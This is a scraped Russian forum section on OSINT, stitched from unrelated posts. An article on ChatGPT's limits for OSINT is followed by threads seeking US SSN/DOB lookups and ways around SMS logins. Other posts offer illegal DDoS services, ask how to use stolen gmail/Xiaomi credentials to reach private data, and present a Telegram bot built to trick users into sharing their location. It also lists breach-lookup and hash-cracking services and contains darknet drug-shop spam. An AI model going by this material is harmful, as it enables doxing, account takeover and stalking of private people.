senin.github.io/2023/01/16/%D0%AD%D0%BA%D1%81%D0%BF%D0%B5%D1%80%D1%82-%D0%BF%D0%BE-%D0%BF%D1%80%D0%BE%D0%B4%D1%83%D0%BA%D1%82%D0%B8%D0%B2%D0%BD%D0%BE%D1%81%D1%82%D0%B8-%D0%B4%D0%B5%D0%BB%D0%B0%D0%B5%D1%82-%D1%81-ChatGPT-%D0%B2%D1%81%D1%8F%D0%BA%D0%BE%D0%B5.-%D0%9E%D1%88%D0%B8%D0%B1%D0%BA%D0%B8-%D0%B8-%D0%BE%D0%B3%D1%80%D0%B0%D0%BD%D0%B8%D1%87%D0%B5%D0%BD%D0%B8%D1%8F.html)
я почерпнул много интересного про использования нейросети утверждает об
ускорении некоторых своих регулярных рабочих процессов в десятки раз. Могу
только подтвердить: умелое использование ChatGPT позволяет вам сократить
десятки минут поиска и анализа разных сайтов до нескольких секунд
ожидания.
Второй этап процесса OSINT включает в себя поиск , валидацию , мониторинг , суммаризацию и индексацию.
Так так план у нас уже есть, давайте переходить к самому поиску. Воспользуемся каким-либо сайтом-источником данных и начнём в нём искать. А как искать?
Умные люди перетащили из информационной безопасности термин "поверхности атаки" и начали использовать их для таких схем — очень удобных и позволяющих быстро оценить, какие данные есть в конкретном месте.
sinwindie/OSINT ](https://github.com/sinwindie/OSINT/blob/master/Twitter/Twitter%20OSINT%20Attack%20Surface.pdf)
Collections of tools and methods created to aid in OSINT collection - sinwindie/OSINT
github.com
Увы, ChatGPT пока не умеет рисовать схемы (разве что таблицы), но давайте попробуем сперва прикинуть такую схему для нашего источника информации.
Не совсем то, что мы хотели, но по сути информация верная. Untappd — это
социальная сеть для любителей пива, и в ней действительно можно искать по
имени, по месту жительства (вернее, по заведениям рядом), по интересам и
предпочтениям (сортам пива) и даже собирать таймлайн из алкогольных
похождений.
Что ж, давайте заставим нейросеть поискать?
Эээ, нет. Очевидно, что ChatGPT ответила какую-то ерунду. В Untappd точно есть
эти сведения, но в действительности она, конечно, не запросила никакие данные,
а придумала что-то правдоподобное в ответ. Давайте уточним, откуда брать
данные.
Выглядит неплохо! Только ответила почему-то на английском... Как будто это
один из вопросов, на которых нейросеть тренировали. Впрочем, окей, давайте
сравним с реальностью.
Так, с нашей оценкой не совпадает. Помним, что нейросеть обучена на данных не
позже 2020 года, давайте спросим, на какой момент данные актуальны.
Хотя бы это она говорит, и то хорошо! Постойте, а почему оценка уже другая?...
Да уж. Точной информации мы от ChatGPT не дождёмся. А, значит, в поиске и
валидации точной информации нейросеть нам не пригодится.
А что насчёт суммаризации? Давайте попросим собрать воедино много данных и "сжать" их до кратких выводов. На примере того же пива, а почему бы и нет.
Очень здорово! Хоть и с обилием клише вроде "неповторимости", но очень похоже
на правду. Я уже был готов заканчивать с этим вопросом, если бы не
перфекционизм: в запросе я написал "её потребителями", а не "его
потребителями" (пива). Поэтому сделал ещё один запрос, и....
ВП: взаимоисключающие параграфы. Теперь наше пиво содержит мало алкоголя и
совсем не питательное, ровно наоборот. Сдаётся мне, вы лжёте, товарищ ChatGPT!
Что ж, на этом и подведём черту: точную информацию предоставлять нейросеть не умеет, лишь что-то похожее на правду. Это поможет нам собрать нужную информацию, но её нужно будет проверить и валидировать. Иногда проще использовать Google или конкретные сайты, так что в этом ChatGPT пока не силён.
Третий этап включает в себя процессы "постпродакшна". Мы уже собрали некоторые данные, провалидировали их, теперь нам нужно синтезировать из них полезную информацию (провести аналитику, если угодно) и сформировать из этого некий отчёт. А в идеале ещё и задуматься о способе доставки этой информации и её долгосрочном хранении на будущее.
Предположим, что мы собрали некоторые данные и хотим сделать вывод. Давайте призовём всю мощь нейросети!
Так, ну насчёт одинаковых имён ChatGPT соврала, но в остальном всё здраво! Но,
погодите, вдруг нейросеть притворяется, что понимает собранные нами данные...
Я поменял ссылки на сайты, а результат всё тот же. Увы, пока что ответ похож
только на поверхностую видимость аналитики.
Довольно здраво. Заметьте, что нейросеть выдала нам и рекомендации по
дальнейшим шагам, которые мы также можем поместить в отчёт. Так, а что насчёт
общей структуры нашего итогового документа?
Очевидно, что это не универсальный шаблон, а некая выжимка из чаще всего
"встречаемых" нейросетью отчётов. Впрочем, тут вы можете увидеть какие-то
пункты, про которые забыли в начале пути. Что заставит вас вернуться и
поискать дополнительную информацию (модель процесса OSINT представляет собой
бесконечный цикл, ведь помните?
.
Двигаемся дальше. Давайте конкретизируем цель отчёта и попробуем описать шаблон подробнее.
Восхитительно, может она ещё и отчёт за меня напишет?...
Что-то похожее на правду, но мне пришлось несколько раз переиначить запрос,
чтобы нейросеть поняла, что я от неё хочу.
Двигаемся дальше. Попросим у ChatGPT совета, как улучшить уже существующий отчёт?
Хотя большинство упомянутых тезисов выглядят простыми и банальными, это не
умаляет их важности, и их смело можно использовать в качестве рекомендаций.
Итог. С логическими умозаключениями и хотя бы поверхностной аналитикой ChatGPT не справляется в той степени, в которой нам хотелось бы. Но для этапа оформления и структурирования информации ChatGPT подходит довольно хорошо. Берём на вооружение!
Если вы следите за моим каналом и докладами на митапах OSINT mindset, то можете помнить мою методику, помогающую быстро разобраться в новой предметной области в целях поиска какой-либо информации. Подробнее в этом видео.
Пришлось изрядно покрутить вопросы к ChatGPT, выяснив, что работает и каким образом. У этого даже есть своё название, кстати: инженерия запросов (и даже целые сообщества таких инженеров уже есть).
В итоге я получил более-менее стабильную структуру, которая чаще всего выдаёт желаемый результат. Приведу её ниже полностью текстом, чтобы вы могли скопировать и использовать такой запрос as is.
Тебе нужно описать по методике область "логотипы сайтов". Методика заключается
в следующем:
1. Перечисляем через запятую самые распространенные существительные,
относящиеся к области, в порядке убывания популярности.
2. Перечисляем через точку с запятой все процессы, связанные с нашей
областью, в формате объект глагол субъект (например, "издательство выпускает
книгу").
3. Перечисляем через точку с запятой информационные системы, где появляется
информация о понятиях нашей области.
4. Перечисляем через запятую URL информационных систем, где появляется
информация о понятиях нашей области.
Ответ по каждому из пунктов должен быть пронумерован, после каждого ответа
должен быть перенос строки, в каждом ответе должно быть не менее 10
результатов.
Посмотрим, что такой запрос выдаёт?
Что мы видим: перечисление ключевых слов из интересующей нас темы "логотипы";
некоторые процессы из темы (заметьте, всё-таки не в том формате, в котором я
запросил); места, где могут встречаться логотипы; а также сами сайты — и они
действительно выглядят полезными для поиска!
Далее я приведу более сложные примеры, для экономии места приводя только название темы / предметной области и скриншот ответа.
Нумизматика:
Морские контейнерные грузоперевозки:
Золотодобыча:
Секвенирование ДНК:
Старые книги:
Так, а что насчёт злополучной таксидермии?
Опять провал. А на английском?
Результаты про таксидермию на английском немногочисленны, но уже хотя бы не
выдуманы. Заметьте, списки сайтов по узким тематикам выглядят так, будто они
искусственно сгенерированы. Так и есть, когда ChatGPT не может "вспомнить"
другие сайты, она делает новые ссылки по подобию других.
Важная ремарка относительно правдивости и полноты данных по разным предметным областям. Помните, что все ответы — это та же выжимка из данных Интернета. И для определённых популярных областей знаний эти данные могут быть неверными просто потому, что в Интернете мало правдивых сведений и много выдумок или банального инфоцыганства.
Уже упомянутый Николай Сенин [отмечает](https://nick- senin.github.io/2023/01/16/%D0%AD%D0%BA%D1%81%D0%BF%D0%B5%D1%80%D1%82-%D0%BF%D0%BE-%D0%BF%D1%80%D0%BE%D0%B4%D1%83%D0%BA%D1%82%D0%B8%D0%B2%D0%BD%D0%BE%D1%81%D1%82%D0%B8-%D0%B4%D0%B5%D0%BB%D0%B0%D0%B5%D1%82-%D1%81-ChatGPT-%D0%B2%D1%81%D1%8F%D0%BA%D0%BE%D0%B5.-%D0%9E%D1%88%D0%B8%D0%B1%D0%BA%D0%B8-%D0%B8-%D0%BE%D0%B3%D1%80%D0%B0%D0%BD%D0%B8%D1%87%D0%B5%D0%BD%D0%B8%D1%8F.html), что эффективнее всего ChatGPT помогает в областях, которые не являются очень узкими, но и не являются сверхпопулярными, попсовыми. В первом случае нейросеть начинает "выдумывать" ответы, во втором результаты будут загажены ерундой.
Слева - запросы на узкие темы, справа - на сверхпопулярные
Наверх
Полезна ли ChatGPT для OSINT? Однозначно! Но, как и с любым другим инструментом, её нужно правильно использовать. Нейросеть поможет:
Как вы заметили, в статье приведены скриншоты из Telegram. Для простоты я пользовался одним из прокси-ботов, но всё же рекомендую использовать оригинальный интерфейс сайта chat.openai.com. Зарегистрироваться там несложно, нужна всего лишь виртуальная иностранная сим-карта.
Разумеется, в статье я отразил только некоторые частные кейсы из направлений, в которых может пригодиться OSINT. Если вы не нашли полезных для себя примеров, то просто попробуйте поэкспериментировать!
Напоминаю, что всё вышеизложенное является моим мнением и может не совпадать с действительностью. Не согласны со мной или хотите дополнить? Смело пишите мне в Telegram или в чат!
Наш сайт |OSINT mindset канал |Форум OSINT- расследований
В текст статьи не попало несколько дополнительных примеров использования ChatGPT. Но я всё равно посчитал их достаточно интересными, и включил в приложение в конец статьи.
Источник: @osint_mindset
Форумчане, доброго времени суток!
И так, вопрос знатокам, разбирающимся в вопросах пробива по ЮСЕ
1. Что на рынке есть лучше, чем beenverified, truthfinder и intelius? Где можно выдернуть максимально много информации в одном сервисе? К примеру, чем пользуется банк или другая фин. организация, когда при прозвоне задают вопросы? Мелкало неоднократно westlaw и lexisnexis, (столкнулся с входом по смс, доступы есть, как обойти?) delvePoint.com и searchbug.com слышал об этом мельком, но тоже интересно пояснение.
2. Что за название контор, через которые смотрят пробивщики SNN и DOB и почему за на них прайс от 2000к зеленых? Можно ли вытащить доступ с логов? (Огромная просьба не предлагать, snn24, infodig и прочие организации с прайсом по 10$ за SNN).
3. Можно ли распутать клубок информации, по типу OSINT СНГ узнал, фулл нейм -> телефон -> почта -> адрес -> и т.д. при этом затрачивая минимальное количиство $ средств?
4. DL, CAR COLOR и прочее данные об автомобильной информации КХ, что, где, как .... сервисы?
5. Также интересует, CR и CS, до этого пока не дошел, но с удовольствием тоже послушал, о пользовании expirian, equifax, transunion, annualcreditreport
P.S. Свой сервис открывать не собираюсь, вопросов куча, понимания мало,
компетентные люди, отзовитесь!
Задача максимально примитивная, необходимо максимально оперативно выдергивать
информацию, при минимальных ресурсах, как финансовых, так и временных.
Задача проста - найти человека которому нужны мои нелегальные услуги, а вот реализация хромает. Как это организовать? Найти человека которому нужен плюшевый мишка намного проще, т.к можно просто пробить в соц. сетях по поискам объявлений. Но с дарком всё обстоит сложнее и мне нужно найти не людей которые уже ищут услуги на дарк форумах, а людей которым нужны услуги скажем ddos, но они не ищут их через какие-то даркнет форумы. Желательно чтобы это можно было адаптировать и искать не только людей которым нужен ddos, но и к примеру осинт, пробив через гос органы и т.д. Собственно говоря как искать людей которые нуждаются в моей не совсем легальной помощи?
@DiscordSensorbot — бесплатно найдет удаленные сообщения, аватарки, сервера, друзей и никнеймы пользователя Discord
Как можно вычислить владельца тг канала , а аткже отойду от темы как можно пробить владельца гурппы в вайбере ? подскажите пожалуйста , может быть какието полезные инструменты или статьи.
есть лог:пароль=gmail
есть лог:пароль=xiaomi аккаунт
как получить доступ все данные? (фото/контакты/прослушка/gallery и тд...)
Доброго времени суток, форумчане!
Интересует вопрос, как можно смотреть КР, БГ и КС, какие сервисы используете
или как это происходит?
Небольшой инструмент-ловушка в телеграм для сбора инфы о пользователе (если конечно он поведется и нажмет на кнопку подтверждения отправки контакта или геолокации боту), можно придумать много ухищрений для того чтобы он это сделал, но я покажу только код основного функционала, остальное за вами.
Работает так, пользователь жмет в боте кнопку "Запросить контакт" или "Запросить геолокацию" и подтверждает отправку. Как это выглядит:
Spoiler: Со стороны пользователя
Spoiler: Что приходит администратору бота
Для установки бота требуется поставить: pip install aiogram
Код бота:
bot.py:
You must have at least 5 reaction(s) to view the content.
P.S. Можно модернизировать и писать в БД, как это делает "Глаз Бога".
Hidden content for authorized users.
Phone Number Lookup and Verification
| Numverify | https://numverify.com | Global Phone Number Validation & Lookup JSON API. Supports 232 countries. | 250 requests FREE |
| Twillo | https://www.twilio.com/docs/lookup/api | Provides a way to retrieve additional information about a phone number | Free or $0.01 per request (for caller lookup) |
| Plivo | https://www.plivo.com/lookup/ | Determine carrier, number type, format, and country for any phone number worldwide | from $0.04 per request |
| GetContact |https://github.com/kovinevmv/getcontact | Find info about user by phone number| from $6,89 in months/100 requests|
| Veriphone | https://veriphone.io/ | Phone number validation & carrier lookup | FREE |Address/ZIP codes lookup
| US Street Address | https://smartystreets.com/docs/cloud/us-street-api | Validate and append data for any US postal address | FREE |
| Google Maps Geocoding API | https://developers.google.com/maps/docum...g/overview | convert addresses (like "1600 Amphitheatre Parkway, Mountain View, CA") into geographic coordinates | 0.005 USD per request |
| Postcoder | https://postcoder.com/address-lookup | Find adress by postcode | £130/5000 requests |
| Zipcodebase | https://zipcodebase.com | Lookup postal codes, calculate distances and much more | 5000 requests FREE |
| Openweathermap geocoding API | https://openweathermap.org/api/geocoding-api | get geographical coordinates (lat, lon) by using name of the location (city name or area name) | 60 calls/minute 1,000,000 calls/month FREE |
| DistanceMatrix | https://distancematrix.ai/product | Calculate, evaluate and plan your routes | $1.25-$2 per 1000 elements |People and documents verification
| Approuve.com | https://appruve.co | Allows you to verify the identities of individuals, businesses, and connect to financial account data across Africa | Paid |
| Onfido.com | https://onfido.com | Onfido Document Verification lets your users scan a photo ID from any device, before checking it’s genuine. Combined with Biometric Verification, it’s a seamless way to anchor an account to the real identity of a customer. India| Paid
| Superpass.io | https://surepass.io/passport-id-verification-api/ | Passport, Photo ID and Driver License Verification in India | Paid
Business/Entity search |
Open corporates | https://api.opencorporates.com | Companies information | Paid, price upon request|
| Linkedin company search API |https://docs.microsoft.com/en-us/linkedi...&tabs=http | Find companies using keywords, industry, location, and other criteria | FREE |
Domain/DNS/IP lookup
| Domainsdb.info | https://domainsdb.info | Registered Domain Names Search | FREE |
| BGPView | https://bgpview.docs.apiary.io/# | allowing consumers to view all sort of analytics data about the current state and structure of the internet | FREE |
| DNSCheck | https://www.dnscheck.co/api | monitor the status of both individual DNS records and groups of related DNS records | up to 10 DNS records/FREE |
| Cloudflare Trace | https://github.com/fawazahmed0/cloudflare-trace-api | Get IP Address, Timestamp, User Agent, Country Code, IATA, HTTP Version, TLS/SSL Version & More | FREE |
| Host.io | https://host.io/ | Get info about domain | FREE |Scraping
| WebScraping.AI | https://webscraping.ai/ | Web Scraping API with built-in proxies and JS rendering | FREE |
| ZenRows | https://www.zenrows.com/ | Web Scraping API that bypasses anti-bot solutions while offering JS rendering, and rotating proxies apiKey Yes Unknown | FREE
|Whois | Whois freaks| https://whoisfreaks.com/ | well-parsed and structured domain WHOIS data for all domain names, registrars, countries and TLDs since the birth of internet | $19/5000 requests |
| WhoisXMLApi | https://whois.whoisxmlapi.com | gathers a variety of domain ownership and registration data points from a comprehensive WHOIS database | 500 requests in month/FREE |GEO IP
| Ipstack | https://ipstack.com | Detect country, region, city and zip code | FREE |
| Ipgeolocation.io | https://ipgeolocation.io | provides country, city, state, province, local currency, latitude and longitude, company detail, ISP lookup, language, zip code, country calling code, time zone, current time, sunset and sunrise time, moonset and moonrise | 30 000 requests per month/FREE |
| IPInfoDB | https://ipinfodb.com/api | Free Geolocation tools and APIs for country, region, city and time zone lookup by IP address | FREE |Wi-fi lookup
| Mylnikov API | https://www.mylnikov.org | public API implementation of Wi-Fi Geo-Location database | FREE |
| Wigle | https://api.wigle.net/ | get location and other information by SSID | FREE |Network
| PeetingDB | https://www.peeringdb.com/apidocs/ | Database of networks, and the go-to location for interconnection data | FREE |
| PacketTotal | https://packettotal.com/api.html | .pcap files analyze| FREE |Finance
| Binlist.net | https://binlist.net/ | get information about bank by BIN | FREE | v |
| FDIC Bank Data API | https://banks.data.fdic.gov/docs/ | institutions, locations and history events | FREE |
| Amdoren | https://www.amdoren.com/currency-api/ | Free currency API with over 150 currencies | FREE |
| VATComply.com | https://www.vatcomply.com/documentation | Exchange rates, geolocation and VAT number validation | FREE |
| Alpaca | https://alpaca.markets/docs/api-document...ta-api-v2/ | Realtime and historical market data on all US equities and ETFs | FREE |
|Swiftcodesapi | https://swiftcodesapi.com | Verifying the validity of a bank SWIFT code or IBAN account number | $39 per month/4000 swift lookups |Email
| Mailboxlayer | https://mailboxlayer.com/ | Simple REST API measuring email deliverability & quality | 100 requests FREE, 5000 requests in month — $14.49 |
| EmailCrawlr | https://emailcrawlr.com/ | Get key information about company websites. Find all email addresses associated with a domain. Get social accounts associated with an email. Verify email address deliverability. | 200 requests FREE, 5000 requets — $40|
| Voila Norbert | https://www.voilanorbert.com/api/ | Find anyone’s email address and ensure your emails reach real people | from $49 in month |
| Kickbox | https://open.kickbox.com/ | Email verification API | FREE |Pastebin/Leaks
| HaveIBeenPwned | https://haveibeenpwned.com/API/v2 | allows the list of pwned accounts (email addresses and usernames) | FREE |
| Psdmp.ws | https://psbdmp.ws/api | search in Pastebin | $9.95 per 10000 requests |
| LeakPeek| https://psbdmp.ws/api | searc in leaks databases | $9.99 per 4 weeks unlimited access |
| BreachDirectory.com| https://breachdirectory.com/api?lang=en | search domain in data breaches databases | FREE |
| LeekLookup| https://leak-lookup.com/api | search domain, email_address, fullname, ip address, phone, password, username in leaks databases | 10 requests FREE |
| BreachDirectory.org| https://rapidapi.com/rohan-patra/api/bre...ry/pricing | search domain, email_address, fullname, ip address, phone, password, username in leaks databases (possible to view password hashes) | 50 requests in month/FREE |Archives
| Wayback Machine API | https://archive.org/help/wayback_api.php | Retrieve information about Wayback capture data | FREE |
| BotsArchive | https://botsarchive.com/docs.html | JSON formatted details about Telegram Bots available in database
| FREE |Hashes decrypt/encrypt | MD5 Decrypt| https://md5decrypt.net/en/Api/ | Search for decrypted hashes in the database | 1.99 EURO/day |
Crypto
| BTC.com | https://btc.com/btc/adapter?type=api-doc | get information about addresses and transanctions | FREE |
| Blockchair | https://blockchair.com | Explore data stored on 17 blockchains (BTC, ETH, Cardano, Ripple etc) | $0.33 - $1 per 1000 calls |
| Bitcointabyse | https://www.bitcoinabuse.com/api-docs | Lookup bitcoin addresses that have been linked to criminal activity | FREE |
| Bitcoinwhoswho | https://www.bitcoinwhoswho.com/api | Scam reports on the Bitcoin Address | FREE |
| Etherscan | https://etherscan.io/apis | Ethereum explorer API | FREE |
| apilayer coinlayer | https://coinlayer.com | Real-time Crypto Currency Exchange Rates | FREE |
| BlockFacts | https://blockfacts.io/ | Real-time crypto data from multiple exchanges via a single unified API, and much more | FREE |
| Brave NewCoin | https://bravenewcoin.com/developers | Real-time and historic crypto data from more than 200+ exchanges | FREE |
| WorldCoinIndex | https://www.worldcoinindex.com/apiservice | Cryptocurrencies Prices | FREE |
IOT
| Shodan | https://developer.shodan.io | IP and DNS information about all devices in the internet | from $59/month |
| Fofa.so | https://fofa.so/static_pages/api_help | IP and DNS information about all devices in the internet | ??? |
| Censys.io | https://censys.io/api | Search engine for Internet connected host and devices | FREE |
Malware
| VirusTotal | https://developers.virustotal.com/reference | files and urls analyze |Public API is FREE |
| AbuseLPDB | https://docs.abuseipdb.com/#introduction | IP/domain/URL reputation | FREE |
| AlienVault Open Threat Exchange (OTX) | https://otx.alienvault.com/api | IP/domain/URL reputation | FREE |
| Phisherman | https://phisherman.gg | IP/domain/URL reputation | FREE |
| URLScan.io | https://urlscan.io/about-api/ | Scan and Analyse URLs | FREE |
| Web of Thrust | https://support.mywot.com/hc/en-us/secti...7734-API-| IP/domain/URL reputation | FREE |
Face Search
| Search4facev | https://search4faces.com/api.html | Search for people in social networks by facial image | $21 per 1000 requests |
Social Media and Messengers
| Twitch | https://dev.twitch.tv/docs/v5/reference |
| Reddit | https://www.reddit.com/dev/api/ |
| YouTube Data API | https://developers.google.com/youtube/v3 |
| Vkontakte | https://vk.com/dev/methods |
| Twitter API | https://developer.twitter.com/en |
| Linkedin API | https://docs.microsoft.com/en-us/linkedin/ |
| All Facebook and Instagram API | https://developers.facebook.com/docs/ |
| Whatsapp Business API |https://www.whatsapp.com/business/api |
| Telegram and Telegram Bot API | https://core.telegram.org |
| Weibo API | https://open.weibo.com/wiki/API文档/en |
| XING | https://dev.xing.com/partners/job_integration/api_docs |
| Viber| https://developers.viber.com/docs/api/rest-bot-api/ |
|
Dicord|https://discord.com/developers/docs|
| Odnoklassniki| https://ok.ru/apiok|
| Blogger | https://developers.google.com/blogger/ |The Blogger APIs allows client applications to view and update Blogger content | FREE |
| Disqus | https://disqus.com/api/docs/auth/ |Communicate with Disqus data | FREE |
| Foursquare | https://developer.foursquare.com/ | Interact with Foursquare users and places (geolocation-based checkins, photos, tips, events, etc) | FREE |
| HackerNews | https://github.com/HackerNews/API | Social news for CS and entrepreneurship | FREE |
| Kakao | https://developers.kakao.com/ | Kakao Login, Share on KakaoTalk, Social Plugins and more | FREE |
| Line | https://developers.line.biz/ |Line Login, Share on Line, Social Plugins and more | FREE |
| TikTok | https://developers.tiktok.com/doc/login-kit-web | Fetches user info and user's video posts on TikTok platform | FREE |
| Tumblr | https://www.tumblr.com/docs/en/api/v2 | Read and write Tumblr Data | FREE |
Search Engines
| Google Custom Search JSON API | https://developers.google.com/custom-search/v1/overview | Search in Google | 100 requests FREE |
| Serpapi | https://serpapi.com | Google, Baidu, Yandex, Yahoo, DuckDuckGo, Bint and many others search results | $50/5000 searches/month |
| Bing Web Search API | https://www.microsoft.com/en-us/bing/api...search-api | Search in Bing (+instant answers and location) | 1000 transactions per month FREE |
| WolframAlpha API | https://products.wolframalpha.com/api/pricing/ | Short answers, conversations, calculators and many more | from $25 per 1000 queries |
| DuckDuckgo Instant Answers API | https://duckduckgo.com/api | An API for some of our Instant Answers, not for full search results. | FREE |
Darknet
| Darksearch.io | https://darksearch.io/apidoc | search by websites in .onion zone | FREE |
Flights
| Aviation Stack | https://aviationstack.com | get information about flights, aircrafts and airlines | FREE |
| OpenSky Network | https://opensky-network.org/apidoc/index.html |Free real-time ADS-B aviation data | FREE |
| AviationAPI | https://docs.aviationapi.com/ | FAA Aeronautical Charts and Publications, Airport Information, and Airport Weather | FREE |
PS. Авторская статья
Сегодня не хочу разбирать банальные темы, на тему: "какую ОС выбрать", "лучшие анонимные мессенджеры", "как стать Darknet хакером". Я скажу всем прямо - если у вас нет мозгов найти эту информацию в интернете, где есть уже тысячи статей. Я вам не помогу...
Речь пойдёт про OSINT, она же разведка, она же "поисковая операция". Мой канал называется "Deanon...", хотя при этом, статей на эту тему практически не было, а то и - не было вовсе. Почему в названии я упомянул Штирлица?
- Личность, это то что первостепенно влияет на конечный результат. В этом деле, очень важно иметь терпение и невероятное любопытство. Ведь, по своему опыту скажу, что я выдыхаюсь через пару часов поиска, когда мой знакомый может сидеть у компьютера неделю без перерыва, и проверять тонну информации. Бесспорно, в одном деле вы можете найти всю нужную вам информацию за час, и сопоставить её. В другом же, вы можете за пару дней найти несколько зацепок, которые ай как трудно будет сопоставлять в единую цепочку
- Инструменты. На самом деле, для хорошего разведчика, инструменты как таковые не нужны. Честно вам скажу, многие могут посмеяться, но это так. Из финансовых инструментов, вам может хватить и подписки в Глазе Бога. Все остальные инструменты, абсолютно бесплатны. Взять в пример мой недавний поиск. Я сделал порядка ста запросов в Глаз Бога, проверил тонну информации, использовал тысячу сайтов для проверки имущества, серверов, и прочего шлака. Единственное, признаюсь честно, заказал пробив по базам, который встал мне в 100$ - что является не то что мелочью, копейкой. Но опять же, по базам бить было не обязательно, удостоверился лично для себя
- OSINT, не для новичков. Сейчас есть тонны самозванцев, которые называют себя профессионалами, хотя по факту все их умения кончаются в тот момент - когда ГБ не выдаёт информацию. Настоящий разведчик, это тот, которому дашь фото человека, а он через пару дней выдаст тебе с десяток листов текста о его биографии, жизни, актуальном местоположении, семье и всём возможном. Выдаст столько информации о человеке, сколько человек не знает о себе. Из моего опыта, в Darknet есть 1-2 хороших разведчика, которые действительно что-то умеют. Такая же история с DDoS`ерами, к слову
Если вы новичок, и после этой статьи у вас встал вопрос "С чего мне начать свою карьеру разведчиком?", или же "Где найти обучение\курс?". Забудьте. Значит это не ваше. Те, кого личность позволяет этим заниматься, в силу врождённых качеств, никогда не будут задавать этот вопрос!
Привет,
Я хотел бы опубликовать подборку инструментов для OSINT и других полезных ресурсов от человека, известного в узких кругах под ником [Pulse]
Недавно я узнал, что в скайпе есть (или был) баг с помощью которого можно узнать IP человека в скайп. Если он сейчас работает напишите инструкцию как его узнать.
intelligence and mapping your attack surface. ](https://github.com/smicallef/spiderfoot)
SpiderFoot automates OSINT for threat intelligence and mapping your attack surface. - smicallef/spiderfoot
github.com
https://osintframework.com/ - рубрикатор инструментов OSINT, общий поиск по
соц. сетям, большой набор разных инструментов для поиска:
https://hunter.io/ - сбор инфо о email по имени домена
![hackertarget.com](/proxy.php?image=https%3A%2F%2Fhackertarget.com%2Fimages%2Ffeatured- appearances.webp&hash=91268002a5e1c7188fbab77c13d2e256&return_error=1)
Online Vulnerability Scanners to map the attack surface and identify vulnerabilities. 28 trusted open source security scanners and network tools.
![hackertarget.com](/proxy.php?image=https%3A%2F%2Fhackertarget.com%2Fwp- content%2Fuploads%2F2018%2F03%2Fhackertarget-logo- square.png&hash=004c7fe6e1ff4aa0f80dcea09bc8507f&return_error=1) hackertarget.com
Поисковики по компаниям
https://www.zoominfo.com - поисковик данных о компаниях
https://opencorpdata.com/ - Open corporate business database
https://domainbigdata.com/ - big database of domains and whois records
https://opencorporates.com/ - largest open database of companies in the
world
https://www.sec.gov/edgar/searchedgar/cik.htm - EDGAR Company Filings | Central Index Key Lookup
http://www.orsr.sk/search_osoba.asp?lan=en - Business register | Ministry of Justice of the Slovak Republic
Больше инструментов в статье
https://habr.com/ru/company/pentestit/blog/554006/
Поиск по USERNAME/NICKNAME:
and User Names to see if they're available ](https://namechk.com/)
There are 351 million registered domain names and counting. Every day, thousands more are registered. Since domain names can only be used by one company or
![namechk.com](/proxy.php?image=https%3A%2F%2Fnamechk.com%2Fwp- content%2Fuploads%2F2021%2F07%2Fcropped- name_check_favicon-2-32x32.png&hash=f3e1dbe6fc561d37e41ab95f2da44de6&return_error=1) namechk.com
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F240491830%2F8a57a054-291d-4a06-8e7f-0995bd393e50&hash=4ed20928045b851c502442347033a206&return_error=1)
данных (OSINT world) ](https://github.com/snooppr/snoop)
Snoop — инструмент разведки на основе открытых данных (OSINT world) - snooppr/snoop
github.com
breach ](https://haveibeenpwned.com/)
Have I Been Pwned allows you to search across multiple data breaches to see if your email address or phone number has been compromised.
haveibeenpwned.com
![hacked-emails.com](/proxy.php?image=https%3A%2F%2Fconstella.ai%2Fwp- content%2Fuploads%2F2024%2F01%2Fidentity-risk- intelligence_final.jpg&hash=d4292d51d8ddd50bfed2d2f34d73f3e0&return_error=1)
Intelligence from a constellation of greater than one trillion compromised identity assets, the new paradigm, ai-driven identity risk intelligence.
![hacked-emails.com](/proxy.php?image=https%3A%2F%2Fconstella.ai%2Fwp- content%2Fuploads%2F2021%2F10%2Felementor%2Fthumbs%2Fcropped-white-favicon- qhfy13zfvs6biz8b8ji716o85ssuh23yx9exfcxvto.png&hash=ede02d4d81d88ac40cac38115ebbc5b9&return_error=1) hacked-emails.com
![ghostproject.fr](/proxy.php?image=https%3A%2F%2Fghostproject.fr%2Fimages%2Fheader- logo.png&hash=40326f0dc8ede4cf6af56cf3ebcfdc1a&return_error=1)
](https://ghostproject.fr/)
Have your online accounts been exposed in a data breach?
ghostproject.fr
Pipl is a provider of identity solutions. We aim to provide the best identity information to organizations in order to ensure that trustworthy people can be trusted.
pipl.com
](https://leakedsource.ru/)
Have you been hacked? Search hundreds of leaked databases like LinkedIn, MySpace, Dropbox, Ashley Madison and Twitter by name, email, ip address, and phone number!
leakedsource.ru
http://mailtester.com/ - E-mail address verification
An OSINT search engine that allows you to perform an email or a phone reverse lookup, find related google reviews, and many other things.
![epieos.com](/proxy.php?image=https%3A%2F%2Fepieos.com%2Fapple-touch- icon.png&hash=29a9744e05e97c3c016982bd9e774baa&return_error=1) epieos.com
Приложение "Skype"
Pipl is a provider of identity solutions. We aim to provide the best identity information to organizations in order to ensure that trustworthy people can be trusted.
pipl.com
An OSINT search engine that allows you to perform an email or a phone reverse lookup, find related google reviews, and many other things.
![epieos.com](/proxy.php?image=https%3A%2F%2Fepieos.com%2Fapple-touch- icon.png&hash=29a9744e05e97c3c016982bd9e774baa&return_error=1) epieos.com
Приложение "GetContact"
Приложение "NumBuster"
Приложение "Truecaller" или сайт https://www.truecaller.com/
KRAKEN Darknet - kraken5.at kraken6.at где заказать наркотики, даркнет наркотики, купить наркотики в москве, магазин наркошоп, сайт где купить наркотики, магазин по продаже наркотиков, магазин наркоты, как найти наркошопы, русские онион сайты,
![doska-org.ru](/proxy.php?image=http%3A%2F%2Fdoska- org.ru%2Ftemplates%2FKRAKEN_HQ%2Fimg%2Ffavicon.ico&hash=08826b752bca24ea4d671781a7377a71&return_error=1) doska-org.ru
Приложение "Skype"
https://crt.sh/ - поиск субдоменов
https://archive.org/web/ - поиск в прошлом (просмотр сайтов на определенную
дату)
https://viewdns.info/ - data about a given website or IP address
https://github.com/Fadavvi/Sub-Drill Simple script for finding subdomains
based on [free] online services without any dependency to API-keys
https://builtwith.com/ - на чем сделан сайт
Geolocation database ](http://unwiredlabs.com)
Unwired Labs Location API locates any IoT device worldwide using Cell Towers, WiFi & IP Address.
unwiredlabs.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fe2e1aa4e47d1e6a0cbbc0f852165371261a1b2623f94779b85e08ced0fca3e5f%2Fjivoi%2Fawesome- osint&hash=70d9f66e4eb77fbad780f1cc6153c968&return_error=1)
awesome OSINT ](https://github.com/jivoi/awesome-osint)
:scream: A curated list of amazingly awesome OSINT - jivoi/awesome-osint
github.com
Ребята подскажите инструменты для максимального точного поиска в каких каналах
и чатах состоит TG юзер
P.S. @tgscanrobot знаю
